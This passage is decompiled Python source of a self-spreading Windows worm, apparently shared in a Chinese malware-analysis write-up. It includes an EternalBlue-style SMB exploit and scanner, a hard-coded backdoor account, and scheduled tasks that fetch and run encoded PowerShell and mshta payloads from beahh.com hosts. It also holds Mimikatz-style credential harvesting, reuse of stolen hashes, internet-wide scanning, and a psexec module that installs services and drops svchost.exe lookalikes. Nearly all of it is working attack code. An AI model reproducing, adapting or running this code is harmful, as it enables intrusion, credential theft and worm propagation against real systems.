% 4        transCommand['Data']['Pad2'] = '\\xff' * pad2Len    else:        transCommand['Data']['Pad2'] = ''        pad2Len = 0    transCommand['Parameters']['DataCount'] = len(data)    transCommand['Parameters']['DataOffset'] = fixedOffset + pad2Len    transCommand['Parameters']['DataDisplacement'] = displacement    transCommand['Data']['Trans_Parameters'] = ''    transCommand['Data']['Trans_Data'] = data    pkt.addCommand(transCommand)    conn.sendSMB(pkt)def send_big_trans2(conn, tid, setup, data, param, firstDataFragmentSize, sendLastChunk=True):    pkt = smb.NewSMBPacket()    pkt['Tid'] = tid    command = pack('<H', setup)    transCommand = smb.SMBCommand(smb.SMB.SMB_COM_NT_TRANSACT)    transCommand['Parameters'] = smb.SMBNTTransaction_Parameters()    transCommand['Parameters']['MaxSetupCount'] = 1    transCommand['Parameters']['MaxParameterCount'] = len(param)    transCommand['Parameters']['MaxDataCount'] = 0    transCommand['Data'] = smb.SMBTransaction2_Data()    transCommand['Parameters']['Setup'] = command    transCommand['Parameters']['TotalParameterCount'] = len(param)    transCommand['Parameters']['TotalDataCount'] = len(data)    fixedOffset = 73 + len(command)    if len(param) > 0:        padLen = (4 - fixedOffset % 4) % 4        padBytes = '\\xff' * padLen        transCommand['Data']['Pad1'] = padBytes    else:        transCommand['Data']['Pad1'] = ''        padLen = 0    transCommand['Parameters']['ParameterCount'] = len(param)    transCommand['Parameters']['ParameterOffset'] = fixedOffset + padLen    if len(data) > 0:        pad2Len = (4 - (fixedOffset + padLen + len(param)) % 4) % 4        transCommand['Data']['Pad2'] = '\\xff' * pad2Len    else:        transCommand['Data']['Pad2'] = ''        pad2Len = 0    transCommand['Parameters']['DataCount'] = firstDataFragmentSize    transCommand['Parameters']['DataOffset'] = transCommand['Parameters']['ParameterOffset'] + len(param) + pad2Len    transCommand['Data']['Trans_Parameters'] = param    transCommand['Data']['Trans_Data'] = data[:firstDataFragmentSize]    pkt.addCommand(transCommand)    conn.sendSMB(pkt)    conn.recvSMB()    i = firstDataFragmentSize    while i < len(data):        sendSize = min(4096, len(data) - i)        if len(data) - i <= 4096:            if not sendLastChunk:                break        send_trans2_second(conn, tid, data[i:i + sendSize], i)        i += sendSize    if sendLastChunk:        conn.recvSMB()    return idef createConnectionWithBigSMBFirst80(target):    sk = socket.create_connection((target, 445))    pkt = '\\x00\\x00' + pack('>H', 65527)    pkt += 'BAAD'    pkt += '\\x00' * 124    sk.send(pkt)    return sklock2 = threading.Lock()def exploit2(target, shellcode, numGroomConn):    global lock2    lock2.acquire()    conn = smb.SMB(target, target)    conn.login_standard('', '')    server_os = conn.get_server_os()    print 'Target OS: ' + server_os    if not (server_os.startswith('Windows 7 ') or server_os.startswith('Windows Server ') and ' 2008 ' in server_os or server_os.startswith('Windows Vista')):        print 'This exploit does not support this target'    tid = conn.tree_connect_andx('\\\\\\\\' + target + '\\\\' + 'IPC$')    progress = send_big_trans2(conn, tid, 0, feaList, '\\x00' * 30, 2000, False)    allocConn = createSessionAllocNonPaged(target, NTFEA_SIZE - 4112)    srvnetConn = []    for i in range(numGroomConn):        sk = createConnectionWithBigSMBFirst80(target)        srvnetConn.append(sk)    holeConn = createSessionAllocNonPaged(target, NTFEA_SIZE - 16)    allocConn.get_socket().close()    for i in range(5):        sk = createConnectionWithBigSMBFirst80(target)        srvnetConn.append(sk)    holeConn.get_socket().close()    send_trans2_second(conn, tid, feaList[progress:], progress)    recvPkt = conn.recvSMB()    retStatus = recvPkt.getNTStatus()    if retStatus == 3221225485L:        print 'good response status: INVALID_PARAMETER'    else:        print ('bad response status: 0x{:08x}').format(retStatus)    for sk in srvnetConn:        sk.send(fake_recv_struct + shellcode)    for sk in srvnetConn:        sk.close()    conn.disconnect_tree(tid)    conn.logoff()    conn.get_socket().close()    time.sleep(2)    lock2.release()lock3 = threading.Lock()def exploit3(target, shellcode, numGroomConn1):    global lock3    lock3.acquire()    conn3 = smb.SMB(target, target)    conn3.login_standard('', '')    server_os3 = conn3.get_server_os()    print 'Target OS: ' + server_os3    if not (server_os3.startswith('Windows 7 ') or server_os3.startswith('Windows Server ') and ' 2008 ' in server_os3 or server_os3.startswith('Windows Vista')):        print 'This exploit does not support this target'    tid3 = conn3.tree_connect_andx('\\\\\\\\' + target + '\\\\' + 'IPC$')    progress3 = send_big_trans2(conn3, tid3, 0, feaList, '\\x00' * 30, 2000, False)    allocConn3 = createSessionAllocNonPaged(target, NTFEA_SIZE - 4112)    srvnetConn3 = []    for i in range(numGroomConn1):        sk3 = createConnectionWithBigSMBFirst80(target)        srvnetConn3.append(sk3)    holeConn3 = createSessionAllocNonPaged(target, NTFEA_SIZE - 16)    allocConn3.get_socket().close()    for i in range(5):        sk3 = createConnectionWithBigSMBFirst80(target)        srvnetConn3.append(sk3)    holeConn3.get_socket().close()    send_trans2_second(conn3, tid3, feaList[progress3:], progress3)    recvPkt3 = conn3.recvSMB()    retStatus3 = recvPkt3.getNTStatus()    if retStatus3 == 3221225485L:        print 'good response status: INVALID_PARAMETER'    else:        print ('bad response status: 0x{:08x}').format(retStatus3)    for sk3 in srvnetConn3:        sk3.send(fake_recv_struct + shellcode)    for sk3 in srvnetConn3:        sk3.close()    conn3.disconnect_tree(tid3)    conn3.logoff()    conn3.get_socket().close()    time.sleep(2)    lock3.release()NEGOTIATE_PROTOCOL_REQUEST = binascii.unhexlify('00000085ff534d4272000000001853c00000000000000000000000000000fffe00004000006200025043204e4554574f524b2050524f4752414d20312e3000024c414e4d414e312e30000257696e646f777320666f7220576f726b67726f75707320332e316100024c4d312e325830303200024c414e4d414e322e3100024e54204c4d20302e313200')SESSION_SETUP_REQUEST = binascii.unhexlify('00000088ff534d4273000000001807c00000000000000000000000000000fffe000040000dff00880004110a000000000000000100000000000000d40000004b000000000000570069006e0064006f007700730020003200300030003000200032003100390035000000570069006e0064006f007700730020003200300030003000200035002e0030000000')TREE_CONNECT_REQUEST = binascii.unhexlify('00000060ff534d4275000000001807c00000000000000000000000000000fffe0008400004ff006000080001003500005c005c003100390032002e003100360038002e003100370035002e003100320038005c00490050004300240000003f3f3f3f3f00')NAMED_PIPE_TRANS_REQUEST = binascii.unhexlify('0000004aff534d42250000000018012800000000000000000000000000088ea3010852981000000000ffffffff0000000000000000000000004a0000004a0002002300000007005c504950455c00')timeout = 1verbose = 0threads_num = 255if 'Windows-XP' in platform.platform():    timeout = 1    threads_num = 2    semaphore1 = threading.BoundedSemaphore(value=2)    semaphore = threading.BoundedSemaphore(value=2)    semaphore2 = threading.BoundedSemaphore(value=2)else:    semaphore1 = threading.BoundedSemaphore(value=255)    semaphore = threading.BoundedSemaphore(value=threads_num)    semaphore2 = threading.BoundedSemaphore(value=100)print_lock = threading.Lock()def print_status(ip, message):    global print_lock    with print_lock:        print '[*] [%s] %s' % (ip, message)def check_ip(ip, tg):    global verbose    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)    s.settimeout(float(timeout) if timeout else None)    host = ip    port = 445    s.connect((host, port))    if verbose:        print_status(ip, 'Sending negotiation protocol request')    s.send(NEGOTIATE_PROTOCOL_REQUEST)    negotiate_reply = s.recv(1024)    if len(negotiate_reply) < 36 or struct.unpack('<I', negotiate_reply[9:13])[0] != 0:        with print_lock:            print \"[-] [%s] can't determine whether it's vulunerable\" % ip            return    if verbose:        print_status(ip, 'Sending session setup request')    s.send(SESSION_SETUP_REQUEST)    session_setup_response = s.recv(1024)    user_id = session_setup_response[32:34]    if verbose:        print_st(ip, 'User ID = %s' % struct.unpack('<H', user_id)[0])    os = ''    word_count = ord(session_setup_response[36])    if word_count != 0:        byte_count = struct.unpack('<H', session_setup_response[43:45])[0]        if len(session_setup_response) != byte_count + 45:            print_status('invalid session setup AndX response')        else:            for i in range(46, len(session_setup_response) - 1):                if ord(session_setup_response[i]) == 0 and ord(session_setup_response[i + 1]) == 0:                    os = session_setup_response[46:i].decode('utf-8')[::2]                    break    modified_tree_connect_request = list(TREE_CONNECT_REQUEST)    modified_tree_connect_request[32] = user_id[0]    modified_tree_connect_request[33] = user_id[1]    modified_tree_connect_request = ('').join(modified_tree_connect_request)    if verbose:        print_status(ip, 'Sending tree connect')    s.send(modified_tree_connect_request)    tree_connect_response = s.recv(1024)    tree_id = tree_connect_response[28:30]    if verbose:        print_status(ip, 'Tree ID = %s' % struct.unpack('<H', tree_id)[0])    modified_trans2_session_setup = list(NAMED_PIPE_TRANS_REQUEST)    modified_trans2_session_setup[28] = tree_id[0]    modified_trans2_session_setup[29] = tree_id[1]    modified_trans2_session_setup[32] = user_id[0]    modified_trans2_session_setup[33] = user_id[1]    modified_trans2_session_setup = ('').join(modified_trans2_session_setup)    if verbose:        print_status(ip, 'Sending named pipe')    s.send(modified_trans2_session_setup)    final_response = s.recv(1024)    if final_response[9] == '\\x05' and final_response[10] == '\\x02' and final_response[11] == '\\x00' and final_response[12] == '\\xc0':        print '[+] [%s](%s) got it!' % (ip, os)        if 'Windows 7' in os:            if scan(ip, 65533) == 0:                print '[+] exploit...' + ip + '   win7'                try:                    exploit(ip, None, 'k8h3d', 'k8d3j9SjfS7', tg)                except:                    print 'no user'                    try:                        exploit2(ip, sc, int(random.randint(5, 13)))                        try:                            print 'exp again '                            exploit(ip, None, 'k8h3d', 'k8d3j9SjfS7', tg)                        except:                            print 'no user2'                        lock2.release()                    except:                        print '[*] maybe crash'                        time.sleep(6)                        try:                            print 'exp again '                            exploit(ip, None, 'k8h3d', 'k8d3j9SjfS7', tg)                        except:                            print 'no user3'                        lock2.release()        elif 'Windows Server 2008' in os:            if scan(ip, 65533) == 0:                print '[+] exploit...' + ip + '   win2k8'                try:                    exploit(ip, None, 'k8h3d', 'k8d3j9SjfS7', tg)                except:                    print 'no user'                    try:                        exploit3(ip, sc, int(random.randint(5, 13)))                        try:                            print 'exp again '                            exploit(ip, None, 'k8h3d', 'k8d3j9SjfS7', tg)                        except:                            print 'no user 2'                        lock3.release()                    except:                        print '[*] maybe crash'                        time.sleep(6)                        try:                            print 'exp again '                            exploit(ip, None, 'k8h3d', 'k8d3j9SjfS7', tg)                        except:                            print 'no user 3'                        lock3.release()        if 'Windows 5.1' in os:            if scan(ip, 65533) == 0:                print '[+] exploit...' + ip + '   xp'                try:                    exploit(ip, None, '', '', tg)                except:                    print 'not succ'        elif 'Windows Server 2003' in os:            if scan(ip, 65533) == 0:                print '[+] exploit...' + ip + '   win2k3'                try:                    exploit(ip, None, '', '', tg)                except:                    print 'not succ'        elif scan(ip, 65533) == 0:            print '[+] exploit...' + ip + '   *************************other os'            for u in userlist:                for p in passlist:                    if u == '' and p != '':                        continue                    try:                        exploit(ip, None, u, p, tg)                    except:                        print 'exp not succ!'    else:        print '[-] [%s](%s) stays in safety' % (ip, os)    s.close()def check_thread(ip_address):    global semaphore    try:        try:            check_ip(ip_address, tg=1)        except Exception as e:            with print_lock:                tmp = 2    finally:        semaphore.release()def check_thread2(ip_address):    try:        try:            check_ip(ip_address, tg=2)        except Exception as e:            with print_lock:                tmp = 2    finally:        semaphore.release()one = 1try:    h_one = socket.socket()    addr = ('', 60124)    h_one.bind(addr)    one = 1except:    one = 2if one == 2:    print 'alredy run eb'    sys.exit()usr = subprocess.Popen('cmd /c net user&netsh advfirewall set allprofile state on&netsh advfirewall firewall add rule name=denyy445 dir=in action=block protocol=TCP localport=445', stdout=subprocess.PIPE)dusr = usr.stdout.read()if 'k8h3d' in dusr:    usr = subprocess.Popen('cmd /c net user k8h3d /del', stdout=subprocess.PIPE)dl = ''ee2 = ''if os.path.exists('c:/windows/system32/svhost.exe'):    dl = 'c:\\\\windows\\\\system32\\\\svhost.exe'if os.path.exists('c:/windows/SysWOW64/svhost.exe'):    dl = 'c:\\\\windows\\\\SysWOW64\\\\svhost.exe'if os.path.exists('c:/windows/system32/drivers/svchost.exe'):    dl = 'c:\\\\windows\\\\system32\\\\drivers\\\\svchost.exe'if os.path.exists('c:/windows/SysWOW64/drivers/svchost.exe'):    dl = 'c:\\\\windows\\\\SysWOW64\\\\drivers\\\\svchost.exe'if os.path.exists('c:/windows/temp/svvhost.exe'):    ee2 = 'c:\\\\windows\\\\temp\\\\svvhost.exe'if os.path.exists('c:/windows/temp/svchost.exe'):    ee2 = 'c:\\\\windows\\\\temp\\\\svchost.exe'if os.path.exists('C:\\\\windows\\\\system32\\\\WindowsPowerShell\\\\'):    usr0 = subprocess.Popen('cmd /c schtasks /create /ru system /sc MINUTE /mo 60 /st 07:05:00 /tn DnsScan /tr \"C:\\\\Windows\\\\temp\\\\svchost.exe\" /F', stdout=subprocess.PIPE)    usr1 = subprocess.Popen('cmd /c schtasks /create /ru system /sc MINUTE /mo 50 /st 07:00:00 /tn \"\\\\Microsoft\\\\windows\\\\Bluetooths\" /tr \"powershell -ep bypass -e SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AdgAuAGIAZQBhAGgAaAAuAGMAbwBtAC8AdgAnACsAJABlAG4AdgA6AFUAUwBFAFIARABPAE0AQQBJAE4AKQA=\" /F', stdout=subprocess.PIPE)def mmka():    global domainlist    global passlist    global userlist2    if os.path.exists('C:\\\\windows\\\\system32\\\\WindowsPowerShell\\\\'):        if os.path.exists('c:/windows/temp/m.ps1'):            if os.path.exists('c:/windows/temp/mkatz.ini'):                print 'mkatz.ini exist'                mtime = os.path.getmtime('c:\\\\windows\\\\temp\\\\mkatz.ini')                mnow = int(time.time())                if (mnow - mtime) / 60 / 60 < 24:                    musr = open('c:\\\\windows\\\\temp\\\\mkatz.ini', 'r').read()                else:                    print 'reload mimi'                    if 'PROGRAMFILES(X86)' in os.environ:                        usr = subprocess.Popen('C:\\\\Windows\\\\SysNative\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe -exec bypass \"import-module c:\\\\windows\\\\temp\\\\m.ps1;Invoke-Cats -pwds\"', stdout=subprocess.PIPE)                    else:                        usr = subprocess.Popen('powershell.exe -exec bypass \"import-module c:\\\\windows\\\\temp\\\\m.ps1;Invoke-Cats -pwds\"', stdout=subprocess.PIPE)                    musr = usr.stdout.read()                    fmk = open('c:\\\\windows\\\\temp\\\\mkatz.ini', 'w')                    fmk.write(musr)                    fmk.close()            else:                print 'reload mimi'                if 'PROGRAMFILES(X86)' in os.environ:                    usr = subprocess.Popen('C:\\\\Windows\\\\SysNative\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe -exec bypass \"import-module c:\\\\windows\\\\temp\\\\m.ps1;Invoke-Cats -pwds\"', stdout=subprocess.PIPE)                else:                    usr = subprocess.Popen('powershell.exe -exec bypass \"import-module c:\\\\windows\\\\temp\\\\m.ps1;Invoke-Cats -pwds\"', stdout=subprocess.PIPE)                musr = usr.stdout.read()                fmk = open('c:\\\\windows\\\\temp\\\\mkatz.ini', 'w')                fmk.write(musr)                fmk.close()        else:            fm = open('c:\\\\windows\\\\temp\\\\m.ps1', 'w')            fm.write(mkatz)            fm.close()            if os.path.exists('c:/windows/temp/mkatz.ini'):                print 'mkatz.ini exist'                mtime = os.path.getmtime('c:\\\\windows\\\\temp\\\\mkatz.ini')                mnow = int(time.time())                if (mnow - mtime) / 60 / 60 < 24:                    print 'reload mimi'                    musr = open('c:\\\\windows\\\\temp\\\\mkatz.ini', 'r').read()                else:                    print 'reload mimi'                    if 'PROGRAMFILES(X86)' in os.environ:                        usr = subprocess.Popen('C:\\\\Windows\\\\SysNative\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe -exec bypass \"import-module c:\\\\windows\\\\temp\\\\m.ps1;Invoke-Cats -pwds\"', stdout=subprocess.PIPE)                    else:                        usr = subprocess.Popen('powershell.exe -exec bypass \"import-module c:\\\\windows\\\\temp\\\\m.ps1;Invoke-Cats -pwds\"', stdout=subprocess.PIPE)                    musr = usr.stdout.read()                    fmk = open('c:\\\\windows\\\\temp\\\\mkatz.ini', 'w')                    fmk.write(musr)                    fmk.close()            else:                print 'reload mimi'                if 'PROGRAMFILES(X86)' in os.environ:                    usr = subprocess.Popen('C:\\\\Windows\\\\SysNative\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe -exec bypass \"import-module c:\\\\windows\\\\temp\\\\m.ps1;Invoke-Cats -pwds\"', stdout=subprocess.PIPE)                else:                    usr = subprocess.Popen('powershell.exe -exec bypass \"import-module c:\\\\windows\\\\temp\\\\m.ps1;Invoke-Cats -pwds\"', stdout=subprocess.PIPE)                musr = usr.stdout.read()                fmk = open('c:\\\\windows\\\\temp\\\\mkatz.ini', 'w')                fmk.write(musr)                fmk.close()    else:        usr3 = subprocess.Popen('cmd /c start /b sc start Schedule&ping localhost&sc query Schedule|findstr RUNNING&&(schtasks /delete /TN Autocheck /f&schtasks /create /ru system /sc MINUTE /mo 50 /ST 07:00:00 /TN Autocheck /tr \"cmd.exe /c mshta http://w.beahh.com/page.html?p%COMPUTERNAME%\"&schtasks /run /TN Autocheck)', stdout=subprocess.PIPE)        usr4 = subprocess.Popen('cmd /c start /b sc start Schedule&ping localhost&sc query Schedule|findstr RUNNING&&(schtasks /delete /TN Autoscan /f&schtasks /create /ru system /sc MINUTE /mo 50 /ST 07:00:00 /TN Autoscan /tr \"C:\\\\Windows\\\\temp\\\\svchost.exe\"&schtasks /run /TN Autoscan)', stdout=subprocess.PIPE)    print 'mimi over'    usern = ''    lmhash = ''    nthash = ''    tspkg = ''    wdigest = ''    kerberos = ''    domain = ''    usernull = ''    try:        dousr = subprocess.Popen('cmd /c wmic ntdomain get domainname', stdout=subprocess.PIPE)        domianusr = dousr.stdout.read()        dousr = subprocess.Popen('cmd /c net user', stdout=subprocess.PIPE)        luser = dousr.stdout.read().split('\\r\\n')[:-3]        for c in luser:            if '-' in c:                continue            for j in c.split(' '):                if '' == j:                    continue                if 'Guest' == j:                    continue                userlist2.append(j.strip())        if '* LM' in musr:            mmlist = musr.split('* LM')            del mmlist[0]            for i in mmlist:                domaint = i.split('Domain   :')[1].split('\\n')[0].strip()                if domaint in domianusr:                    domainlist.append(domaint)                for ii in i.split('Authentication')[0].split('Username :')[1:]:                    unt = ii.split('\\n')[0].strip()                    userlist2.append(unt)                for ii in i.split('Authentication')[0].split('Password :')[1:]:                    pwdt = ii.split('\\n')[0].strip()                    if pwdt != '(null)':                        passlist.append(pwdt)                passlist = list(set(passlist))                userlist2 = list(set(userlist2))                domainlist = list(set(domainlist))        else:            print 'nobody logon'        if '* NTLM' in musr:            mmlist = musr.split('* NTLM')            del mmlist[0]            for i in mmlist:                NThash = i.split(':')[1].split('\\n')[0].strip()                ntlist.append(NThash)    except:        print 'except'mmka()var = 1while var == 1:    print 'start scan'    if '.exe' in dl:        for network in find_ip():            print network            ip, cidr = network.split('/')            cidr = int(cidr)            host_bits = 32 - cidr            i = struct.unpack('>I', socket.inet_aton(ip))[0]            start = i >> host_bits << host_bits            end = i | (1 << host_bits) - 1            for i in range(start + 1, end):                semaphore1.acquire()                ip = socket.inet_ntoa(struct.pack('>I', i))                t1 = threading.Thread(target=scansmb, args=(ip, 445))                t1.start()            time.sleep(1)    print 'smb over  sleep 200s'    time.sleep(5)    if 'Windows-XP' in platform.platform():        time.sleep(1000)    else:        print 'start scan2'        if '.exe' in dl:            for network in iplist2:                ip, cidr = network.split('/')                if ip.split('.')[0].strip() == '192':                    continue                if ip.split('.')[0].strip() == '127':                    continue                if ip.split('.')[0].strip() == '10':                    continue                if ip.split('.')[0].strip() == '0':                    continue                if ip.split('.')[0].strip() == '100':                    continue                if ip.split('.')[0].strip() == '172':                    continue                if int(ip.split('.')[0].strip()) in xrange(224, 256):                    continue                print network                cidr = int(cidr)                host_bits = 32 - 16                i = struct.unpack('>I', socket.inet_aton(ip))[0]                start = i >> host_bits << host_bits                end = i | (1 << host_bits) - 1                for i in range(start + 1, end):                    semaphore2.acquire()                    ip = socket.inet_ntoa(struct.pack('>I', i))                    t1 = threading.Thread(target=scansmb3, args=(ip, 445))                    t1.start()                time.sleep(1)        print 'smb over  sleep 200s'        time.sleep(5)        print 'eb2 internet'        for s in xip(500):            if s.split('.')[0].strip() == '127':                continue            if s.split('.')[0].strip() == '10':                continue            if s.split('.')[0].strip() == '0':                continue            if s.split('.')[0].strip() == '100':                continue            if s.split('.')[0].strip() == '172':                continue            if int(s.split('.')[0].strip()) in xrange(224, 256):                continue            print s            ip, cidr = s.split('/')            cidr = int(cidr)            host_bits = 32 - cidr            i = struct.unpack('>I', socket.inet_aton(ip))[0]            start = i >> host_bits << host_bits            end = i | (1 << host_bits) - 1            for i in range(start + 1, end):                semaphore1.acquire()                ip = socket.inet_ntoa(struct.pack('>I', i))                t1 = threading.Thread(target=scansmb2, args=(ip, 445))                t1.start()            time.sleep(2)        print 'eb2 over'        print 'sleep 10min'        time.sleep(5)    mmka()# global h_one ## Warning: Unused global  里面有两个不是公开的库，mysmb和psexec，其中mysmb看起来是永恒之蓝RCE中的代码，psexec有找到几个相似的但是没找到一样的，所以代码也放上来：  Show Code  # uncompyle6 version 3.9.2# Python bytecode version base 2.7 (62211)# Decompiled from: Python 2.7.18 (default, Jun 24 2022, 18:01:55) # [GCC 8.5.0 20210514 (Red Hat 8.5.0-13)]# Embedded file name: psexec.pyimport sys, os, cmd, loggingfrom threading import Thread, Lockimport argparse, random, string, timefrom impacket.examples import loggerfrom impacket import version, smbfrom impacket.smbconnection import SMBConnectionfrom impacket.dcerpc.v5 import transportfrom impacket.structure import Structurefrom impacket.examples import remcomsvc, serviceinstallclass RemComMessage(Structure):    structure = (     ('Command', '4096s=\"\"'),     ('WorkingDir', '260s=\"\"'),     ('Priority', '<L=0x20'),     ('ProcessID', '<L=0x01'),     ('Machine', '260s=\"\"'),     ('NoWait', '<L=0'))class RemComResponse(Structure):    structure = (     ('ErrorCode', '<L=0'),     ('ReturnCode', '<L=0'))RemComSTDOUT = 'RemCom_stdout'RemComSTDIN = 'RemCom_stdin'RemComSTDERR = 'RemCom_stderr'lock = Lock()class RemoteShell(cmd.Cmd):    def __init__(self, server, port, credentials, tid, fid, share, transport):        cmd.Cmd.__init__(self, False)        self.prompt = '\\x08'        self.server = server        self.transferClient = None        self.tid = tid        self.fid = fid        self.credentials = credentials        self.share = share        self.port = port        self.transport = transport        return    def connect_transferClient(self):        self.transferClient = SMBConnection('*SMBSERVER', self.server.getRemoteHost(), sess_port=self.port, preferredDialect=dialect)        user, passwd, domain, lm, nt, aesKey, TGT, TGS = self.credentials        if self.transport.get_kerberos() is True:            self.transferClient.kerberosLogin(user, passwd, domain, lm, nt, aesKey, TGT=TGT, TGS=TGS)        else:            self.transferClient.login(user, passwd, domain, lm, nt)    def do_help(self, line):        print '\\n lcd {path}                 - changes the current local directory to {path}\\n exit                       - terminates the server process (and this session)\\n put {src_file, dst_path}   - uploads a local file to the dst_path RELATIVE to the connected share (%s)\\n get {file}                 - downloads pathname RELATIVE to the connected share (%s) to the current local dir\\n ! {cmd}                    - executes a local shell cmd\\n' % (self.share, self.share)        self.send_data('\\r\\n', False)    def do_shell(self, s):        os.system(s)        self.send_data('\\r\\n')    def do_get(self, src_path):        try:            if self.transferClient is None:                self.connect_transferClient()            import ntpath            filename = ntpath.basename(src_path)            fh = open(filename, 'wb')            logging.info('Downloading %s\\\\%s' % (self.share, src_path))            self.transferClient.getFile(self.share, src_path, fh.write)            fh.close()        except Exception as e:            logging.critical(str(e))        self.send_data('\\r\\n')        return    def do_put(self, s):        try:            if self.transferClient is None:                self.connect_transferClient()            params = s.split(' ')            if len(params) > 1:                src_path = params[0]                dst_path = params[1]            elif len(params) == 1:                src_path = params[0]                dst_path = '/'            src_file = os.path.basename(src_path)            fh = open(src_path, 'rb')            f = dst_path + '/' + src_file            print '!!!!!!!!!!!!!!!!' + f            pathname = string.replace(f, '/', '\\\\')            logging.info('Uploading1111111111 %s to %s\\\\%s' % (src_file, self.share, dst_path))            self.transferClient.putFile(self.share, pathname.decode(sys.stdin.encoding), fh.read)            fh.close()        except Exception as e:            logging.error(str(e))        self.send_data('\\r\\n')        return    def do_lcd(self, s):        if s == '':            print os.getcwd()        else:            os.chdir(s)        self.send_data('\\r\\n')    def emptyline(self):        self.send_data('\\r\\n')    def default(self, line):        self.send_data(line.decode(sys.stdin.encoding).encode('cp437') + '\\r\\n')    def send_data(self, data, hideOutput=True):        global LastDataSent        if hideOutput is True:            LastDataSent = data        else:            LastDataSent = ''        self.server.writeFile(self.tid, self.fid, data)class Pipes(Thread):    def __init__(self, transport, pipe, permissions, share=None):        Thread.__init__(self)        self.server = 0        self.transport = transport        self.credentials = transport.get_credentials()        self.tid = 0        self.fid = 0        self.share = share        self.port = transport.get_dport()        self.pipe = pipe        self.permissions = permissions        self.daemon = True    def connectPipe(self):        try:            self.server = SMBConnection('*SMBSERVER', self.transport.get_smb_connection().getRemoteHost(), sess_port=self.port, preferredDialect=dialect)            user, passwd, domain, lm, nt, aesKey, TGT, TGS = self.credentials            if self.transport.get_kerberos() is True:                self.server.kerberosLogin(user, passwd, domain, lm, nt, aesKey, TGT=TGT, TGS=TGS)            else:                self.server.login(user, passwd, domain, lm, nt)            self.tid = self.server.connectTree('IPC$')            self.server.waitNamedPipe(self.tid, self.pipe)            self.fid = self.server.openFile(self.tid, self.pipe, self.permissions, creationOption=64, fileAttributes=128)            self.server.setTimeout(1000)        except:            logging.error(\"Something wen't wrong connecting the pipes(%s), try again\" % self.__class__)class RemoteStdOutPipe(Pipes):    def __init__(self, transport, pipe, permisssions):        Pipes.__init__(self, transport, pipe, permisssions)    def run(self):        global LastDataSent        self.connectPipe()        return        while True:            try:                ans = self.server.readFile(self.tid, self.fid, 0, 1024)            except:                pass            else:                try:                    if ans != LastDataSent:                        sys.stdout.write(ans.decode('cp437'))                        sys.stdout.flush()                    else:                        LastDataSent = ''                    if LastDataSent > 10:                        LastDataSent = ''                except:                    passclass RemoteStdErrPipe(Pipes):    def __init__(self, transport, pipe, permisssions):        Pipes.__init__(self, transport, pipe, permisssions)    def run(self):        self.connectPipe()        return        while True:            try:                ans = self.server.readFile(self.tid, self.fid, 0, 1024)            except:                pass            else:                try:                    sys.stderr.write(str(ans))                    sys.stderr.flush()                except:                    passclass RemoteStdInPipe(Pipes):    def __init__(self, transport, pipe, permisssions, share=None):        self.shell = None        Pipes.__init__(self, transport, pipe, permisssions, share)        return    def run(self):        self.connectPipe()        return        self.shell = RemoteShell(self.server, self.port, self.credentials, self.tid, self.fid, self.share, self.transport)        self.shell.cmdloop()class StrReader:    def __init__(self, str):        self.__str = str    def close(self):        pass    def read(self, size=1024):        ret_str = self.__str[:size]        self.__str = self.__str[size:]        return ret_strclass PSEXEC:    KNOWN_PROTOCOLS = {'445/SMB': ('ncacn_np:%s[\\\\pipe\\\\svcctl]', 445)}    def __init__(self, copyFile=None, exeFile=None, cmd='', username='', password='', domain='', fr='', hashes=None, aesKey=None, doKerberos=False):        self.__username = username        self.__password = password        self.__protocols = PSEXEC.KNOWN_PROTOCOLS.keys()        self.__command = cmd        self.__domain = domain        self.__fr = fr        self.__lmhash = ''        self.__nthash = ''        self.__path = None        self.__aesKey = aesKey        self.__exeFile = exeFile        self.__copyFile = copyFile        self.__doKerberos = doKerberos        if hashes is not None:            self.__lmhash, self.__nthash = hashes.split(':')        return    def run(self, addr):        for protocol in self.__protocols:            protodef = PSEXEC.KNOWN_PROTOCOLS[protocol]            port = protodef[1]            logging.info('Trying protocol %s...\\n' % protocol)            stringbinding = protodef[0] % addr            rpctransport = transport.DCERPCTransportFactory(stringbinding)            rpctransport.set_dport(port)            if hasattr(rpctransport, 'set_credentials'):                rpctransport.set_credentials(self.__username, self.__password, self.__domain, self.__lmhash, self.__nthash, self.__aesKey)            rpctransport.set_kerberos(self.__doKerberos)            self.doStuff(rpctransport)    def openPipe(self, s, tid, pipe, accessMask):        pipeReady = False        tries = 50        while pipeReady is False and tries > 0:            try:                s.waitNamedPipe(tid, pipe)                pipeReady = True            except:                tries -= 1                time.sleep(2)        if tries == 0:            logging.critical('Pipe not ready, aborting')            raise        fid = s.openFile(tid, pipe, accessMask, creationOption=64, fileAttributes=128)        return fid    def connectPipe(rpctransport, pipe, permisssions):        transport = rpctransport        server = SMBConnection('*SMBSERVER', transport.get_smb_connection().getRemoteHost(), sess_port=transport.get_dport(), preferredDialect=dialect)        user, passwd, domain, lm, nt, aesKey, TGT, TGS = transport.get_credentials()        if transport.get_kerberos() is True:            server.kerberosLogin(user, passwd, domain, lm, nt, aesKey, TGT=TGT, TGS=TGS)        else:            server.login(user, passwd, domain, lm, nt)        tid = server.connectTree('IPC$')        server.waitNamedPipe(tid, pipe)        fid = self.server.openFile(tid, pipe, permissions, creationOption=64, fileAttributes=128)        server.setTimeout(6000)        return server    def doStuff(self, rpctransport):        global LastDataSent        global dialect        dce = rpctransport.get_dce_rpc()        try:            dce.connect()        except Exception as e:            return False        dialect = rpctransport.get_smb_connection().getDialect()        try:            unInstalled = False            s = rpctransport.get_smb_connection()            s.setTimeout(30000)            installService = serviceinstall.ServiceInstall(rpctransport.get_smb_connection(), remcomsvc.RemComSvc())            installService.install()            if self.__copyFile:                try:                    installService.copy_file(self.__copyFile, installService.getShare(), 'temp\\\\svchost.exe')                except:                    print 'file exist'            tid = s.connectTree('IPC$')            fid_main = self.openPipe(s, tid, '\\\\RemCom_communicaton', 1180063)            packet = RemComMessage()            pid = os.getpid()            packet['Machine'] = ('').join([random.choice(string.letters) for _ in range(4)])            packet['ProcessID'] = pid            if self.__exeFile:                if self.__fr == '1':                    installService.copy_file(self.__exeFile, installService.getShare(), 'temp\\\\updll.exe')                    self.__command = self.__command.replace('\"', '\"\"')                    vbs_cmd = '\\n    Set ws = 